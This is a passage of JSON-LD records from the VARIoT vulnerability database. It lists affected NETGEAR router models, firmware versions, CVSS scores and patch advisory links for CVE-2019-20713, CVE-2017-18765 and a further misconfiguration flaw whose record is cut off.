"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-30684"
}
],
"trust": 1.0178059882352941
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-30684"
}
]
},
"last_update_date": "2024-11-23T22:25:33.167000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Post-Authentication Stack Overflow on Some Routers and Gateways, PSV-2018-0253",
"trust": 0.8,
"url": "https://kb.netgear.com/000061215/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-and-Gateways-PSV-2018-0253"
},
{
"title": "Patch for Multiple NETGEAR product buffer overflow vulnerabilities (CNVD-2020-30684)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/219489"
},
{
"title": "Multiple NETGEAR Product Buffer Error Vulnerability Fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=114794"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-30684"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015462"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1297"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015462"
},
{
"db": "NVD",
"id": "CVE-2019-20713"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20713"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000061215/security-advisory-for-post-authentication-stack-overflow-on-some-routers-and-gateways-psv-2018-0253"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-20713"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-30684"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015462"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1297"
},
{
"db": "NVD",
"id": "CVE-2019-20713"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-30684"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015462"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1297"
},
{
"db": "NVD",
"id": "CVE-2019-20713"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-30684"
},
{
"date": "2020-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015462"
},
{
"date": "2020-04-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1297"
},
{
"date": "2020-04-16T19:15:24.713000",
"db": "NVD",
"id": "CVE-2019-20713"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-30684"
},
{
"date": "2020-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015462"
},
{
"date": "2020-04-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1297"
},
{
"date": "2024-11-21T04:39:09.657000",
"db": "NVD",
"id": "CVE-2019-20713"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Out-of-bounds write vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015462"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1297"
}
],
"trust": 0.6
}
}
var-202004-1367
Vulnerability from variot
Certain NETGEAR devices are affected by denial of service. This affects R6300v2 before 1.0.4.8, R6400 before 1.0.1.22, R6400v2 before 1.0.2.32, R6700 before 1.0.1.20, R6900 before 1.0.1.20, WNR3500Lv2 before 1.2.0.44, and WNR2000v2 before 1.2.0.8. plural NETGEAR An unspecified vulnerability exists in the device.Service operation interruption (DoS) It may be put into a state. NETGEAR WNR3500L, etc. are all wireless routers from NETGEAR.
There are security vulnerabilities in many NETGEAR products
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1367",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "wnr2000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.8"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.32"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.44"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.32"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "wnr2000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.2.0.8"
},
{
"model": "wnr3500l",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.2.0.44"
},
{
"model": "r6400v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.32"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "wnr2000v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.2.0.8"
},
{
"model": "wnr3500lv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.2.0.44"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-59160"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014944"
},
{
"db": "NVD",
"id": "CVE-2017-18765"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6900_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:wnr2000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:wnr3500l_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014944"
}
]
},
"cve": "CVE-2017-18765",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 3.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.5,
"id": "CVE-2017-18765",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.0,
"vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 3.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2017-014944",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 3.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.5,
"id": "CNVD-2021-59160",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18765",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18765",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2017-014944",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18765",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2017-18765",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2017-014944",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2021-59160",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1911",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-59160"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014944"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1911"
},
{
"db": "NVD",
"id": "CVE-2017-18765"
},
{
"db": "NVD",
"id": "CVE-2017-18765"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by denial of service. This affects R6300v2 before 1.0.4.8, R6400 before 1.0.1.22, R6400v2 before 1.0.2.32, R6700 before 1.0.1.20, R6900 before 1.0.1.20, WNR3500Lv2 before 1.2.0.44, and WNR2000v2 before 1.2.0.8. plural NETGEAR An unspecified vulnerability exists in the device.Service operation interruption (DoS) It may be put into a state. NETGEAR WNR3500L, etc. are all wireless routers from NETGEAR. \n\r\n\r\nThere are security vulnerabilities in many NETGEAR products",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18765"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014944"
},
{
"db": "CNVD",
"id": "CNVD-2021-59160"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-18765",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014944",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-59160",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1911",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-59160"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014944"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1911"
},
{
"db": "NVD",
"id": "CVE-2017-18765"
}
]
},
"id": "VAR-202004-1367",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-59160"
}
],
"trust": 1.2096626228571428
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-59160"
}
]
},
"last_update_date": "2024-11-23T22:48:01.613000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Denial of Service on Some Routers, PSV-2017-0648",
"trust": 0.8,
"url": "https://kb.netgear.com/000051480/Security-Advisory-for-Denial-of-Service-on-Some-Routers-PSV-2017-0648"
},
{
"title": "Patch for Denial of service vulnerabilities in multiple NETGEAR products",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/284341"
},
{
"title": "Multiple NETGEAR Product security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=116682"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-59160"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014944"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1911"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18765"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18765"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000051480/security-advisory-for-denial-of-service-on-some-routers-psv-2017-0648"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18765"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-59160"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014944"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1911"
},
{
"db": "NVD",
"id": "CVE-2017-18765"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-59160"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014944"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1911"
},
{
"db": "NVD",
"id": "CVE-2017-18765"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-59160"
},
{
"date": "2020-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014944"
},
{
"date": "2020-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1911"
},
{
"date": "2020-04-22T16:15:11.543000",
"db": "NVD",
"id": "CVE-2017-18765"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-59160"
},
{
"date": "2020-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014944"
},
{
"date": "2020-04-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1911"
},
{
"date": "2024-11-21T03:20:51.913000",
"db": "NVD",
"id": "CVE-2017-18765"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1911"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014944"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1911"
}
],
"trust": 0.6
}
}
var-202004-1688
Vulnerability from variot
plural NETGEAR An unspecified vulnerability exists in the device.Information may be obtained and tampered with. Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D1500 prior to 1.0.0.27, D500 prior to 1.0.0.27, D6100 prior to 1.0.0.57, D6220 prior to 1.0.0.40, D6400 prior to 1.0.0.74, D7000 prior to 1.0.1.60, D7800 prior to 1.0.1.34, D8500 prior to 1.0.3.39, DGN2200v4 prior to 1.0.0.94, DGN2200Bv4 prior to 1.0.0.94, EX2700 prior to 1.0.1.42, EX3700 prior to 1.0.0.64, EX3800 prior to 1.0.0.64, EX6000 prior to 1.0.0.24, EX6100 prior to 1.0.2.18, EX6120 prior to 1.0.0.32, EX6130 prior to 1.0.0.22, EX6150 prior to 1.0.0.34_1.0.70, EX6200 prior to 1.0.3.82_1.1.117, EX6400 prior to 1.0.1.78, EX7000 prior to 1.0.0.56, EX7300 prior to 1.0.1., JNR1010v2 prior to 1.1.0.42, JR6150 prior to 1.0.1.10, JWNR2010v5 prior to 1.1.0.42, PR2000 prior to 1.0.0.22, R6050 prior to 1.0.1.10, R6100 prior to 1.0.1.16, R6220 prior to 1.1.0.50, R6250 prior to 1.0.4.14, R6300v2 prior to 1.0.4.12, R6400v2 prior to 1.0.2.34, R6700 prior to 1.0.1.26, R6900 prior to 1.0.1.26, R6900P prior to 1.2.0.22, R7000 prior to 1.0.9.6, R7000P prior to 1.2.0.22, R7100LG prior to 1.0.0.40, R7300DST prior to 1.0.0.54, R7500 prior to 1.0.0.110, R7500v2 prior to 1.0.3.26, R7800 prior to 1.0.2.44, R7900 prior to 1.0.1.26, R8000 prior to 1.0.3.48, R8300 prior to 1.0.2.104, R8500 prior to 1.0.2.104, R9000 prior to 1.0.3.10, WN2000RPTv3 prior to 1.0.1.26, WN2500RPv2 prior to 1.0.1.46, WN3000RPv3 prior to 1.0.2.66, WN3100RPv2 prior to 1.0.0.56, WNDR3400v3 prior to 1.0.1.14, WNDR3700v4 prior to 1.0.2.96, WNDR3700v5 prior to 1.1.0.54, WNDR4300 prior to 1.0.2.98, WNDR4300v2 prior to 1.0.0.48, WNDR4500v3 prior to 1.0.0.48, WNR1000v4 prior to 1.1.0.42, WNR2000v5 prior to 1.0.0.64, WNR2020 prior to 1.1.0.42, and WNR2050 prior to 1.1.0.42
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1688",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ex6120",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.60"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.14"
},
{
"model": "ex6100",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.18"
},
{
"model": "pr2000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "wn3100rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "jwnr2010",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.42"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.104"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.34"
},
{
"model": "r9000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.10"
},
{
"model": "d500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.27"
},
{
"model": "wnr2020",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.42"
},
{
"model": "d1500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.27"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "wndr4300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.48"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.22"
},
{
"model": "ex3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "ex2700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.42"
},
{
"model": "d6100",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.57"
},
{
"model": "r6050",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.10"
},
{
"model": "r7800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.44"
},
{
"model": "wn2500rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.22"
},
{
"model": "wndr4300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.98"
},
{
"model": "ex6200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.82_1.1.117"
},
{
